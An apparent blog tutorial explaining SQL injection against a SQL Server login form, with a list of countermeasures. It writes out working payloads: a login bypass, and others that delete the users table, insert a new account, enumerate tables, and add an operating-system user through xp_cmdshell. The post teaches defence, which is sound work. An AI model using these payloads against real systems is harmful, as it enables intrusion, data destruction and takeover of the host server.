This post is intended for learning
purpose in a topic of PenTest and how to avoid bad user input to protect your
site, system from begin misused.
SQL
Injection:
SQL
Injection is most popular SQL vulnerability that used to attack SQL database,
this attack may affect the hosting operating system. When user gains access to
your database, he tries to escalate his privilege to gain administration
permission.
If the user
gains administration permission on your database management system, then he
will try to execute systems command that allowed by your DBMS and then try to
create/escalate his user permission and get administration permission on your
server, think about what he can do with administration permission on your
server … simply he own your server not you.
In this
post I will introduce you through basic SQL Injection concepts and I will makes
some hands on to show you how it is simple to do it. (Notice this post
for how to prevent yourself from those types of attack no to try it to gain
access on others system, try it on your own systems or authorized system)
Conceder
those queries (SQL SERVER):
Select *
From users WHERE user name = ‘user’ AND password = ‘password’;
When this
query executed on SSMS it will return all user data when user name is user and
password is password, but if we have web page and want to authenticate users we
will ask any user to provide us with those information.
If we use
ASP.Net for example the Query String will be as:
user
textbox component to enter username, password textbox component to enter
password.
You can
watch my demo on youtube http://www.youtube.com/watch?v=ylYXeuNxzYQ&feature=youtu.be
and
QueryString
= “SELECT * FROM users WHERE username = ‘ ” + user.text + “ ‘ AND password = ‘
“ + password.text + “ ’ “.
When user
enter valid input (e.g username = user, password = password) then the query
send to SQL server database will be
SELECT *
FROM users WHERE username = ‘user’ AND password = ‘password’
BUT
if user enter this information (‘ OR 1 = 1; --, anything) then the query will be:
SELECT *
FROM users WHERE username = ‘ ‘ OR 1 = 1 ; -- AND password = ‘anything’;
Then the
user will get access to our database because the system will return all user
table (Consider always 1 = 1 (this is the trick)) and the query will escape the
rest of statement because it is commented using ( -- those dashes used as for
comments in SQL Server ) .
Consider
those examples where user not only access the system but he do malicious things
like delete, update or even insert data.
IF
user execute these query he will get all tables on the database
SELECT*FROMinformation_schema.tables (SQL Server 2008)
SELECT*FROMsysobjectsWHERE xtype='U' (SQL Server 2000)
When he get
a list of all user table in the database he can do anything
DELETE
all user from user table (That means no one (from whom on user table) will
access the system the business will stop)
If he enter
username = ‘ OR 1 = 1; Delete users --
Password =
anything
SELECT *
FROM users WHERE username = ‘ ‘ OR 1 = 1 ; Delete users -- AND password =
‘anything’;
Now the
user table is empty.
He
can insert new user
Username =
‘ OR 1 = 1; Insert into users (username, password) values (‘new’, ‘new’); --
Password =
anything
SELECT *
FROM users WHERE username = ‘ ‘ OR 1 = 1 ; -- AND password = ‘anything’;
And many
more, to see more watch demo on http://www.youtube.com/watch?v=cBqJJKxOWFw&feature=youtu.be
and
Think about
those queries:
you can pass operating system commands using master.dbo.xp_cmdshell
e.g.
username =
‘ OR 1 = 1; EXEC master.dbo.xp_cmdshell ‘net user (newuser) / ADD’ --;
password =
anthing.
Xp_cmdshell
is disable by default (we will talk about this later).
Now you
have user on the local system (what else that is amazing).
You can
shut down database any more.
Countermeasure:
·
Disable any feature that provided by your DBMS
you didn’t use. e.g. xp_cmdshell in the previous example you see how it is
malicious. You DBMS must be will configured, attackers always exploits you by
using your bad configuration.
·
Least privilege, every user in your database
must provide a minimum permission to complete his tasks. If your user is a
reporting user he must gain read permission so the above exploits for delete,
insert, and update will not happen.
·
Validate user input, this is very important you
have to check if your user enter valid or invalid input and take action
according to the input.
·
Always, if there is an error occurred you must
provide custom error message, do not let SQL server provide error messages for
your end user he may use this error message badly. Try … catch exception always
help.
·
Use database abstraction (refer to my post http://elmozamil.blogspot.comon about database), you must try to use view
level if it possible so the users have no access on database objects except the
specified views.
·
Use stored procedure and give the user
permission on store procedure to update, and insert, delete, and select. I
think you must use stored procedure for every database manipulation when you
ask users about input. Stored procedure use parameters and it manipulate those
parameter as the data type declared, and it limit the user will the size of the
parameter. If the user name must be 10 character the SP will get the first 10
character if users insert more.
·
Use parameterized SQL command.
·
Always know Google is your best friend, Google
and you will get more.
I hope you
enjoy.
In the demo
I will exploit SQL server and MYSQL databases and gain permission on the
hosting operating system.
No comments:
Post a Comment